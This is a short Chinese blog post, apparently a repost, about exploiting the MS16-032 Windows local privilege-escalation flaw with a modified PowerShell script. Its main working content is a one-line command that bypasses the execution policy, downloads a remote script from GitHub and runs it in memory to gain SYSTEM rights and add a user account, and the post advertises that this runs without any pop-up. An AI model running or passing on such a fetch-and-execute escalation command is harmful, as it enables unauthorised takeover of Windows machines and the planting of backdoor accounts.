MS16-032 windows本地提权

exploit-db的详情:
      https://www.exploit-db.com/exploits/39574/

试用系统:

Tested on x32 Win7, x64 Win8, x64 2k12R2

提权powershell脚本:

Invoke-MS16-032.ps1

测试详情:

图片[1]-MS16-032 Windows本地提权利用与powershell脚本

为了方便使用,对这个脚本进行了简单的修改,可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:

Invoke-MS16-032.ps1

使用方式如下:


      添加用户:

图片[2]-MS16-032 Windows本地提权利用与powershell脚本

运行某程序:

图片[3]-MS16-032 Windows本地提权利用与powershell脚本

远程加用户:

直接执行如下命令,可进行提权并添加用户:

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1’);Invoke-MS16-032 -Application cmd.exe -commandline ‘/c net user evi1cg test123 /add'”

演示如下:

图片[4]-MS16-032 Windows本地提权利用与powershell脚本

文章出处:Evi1cg’s blog   

https://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容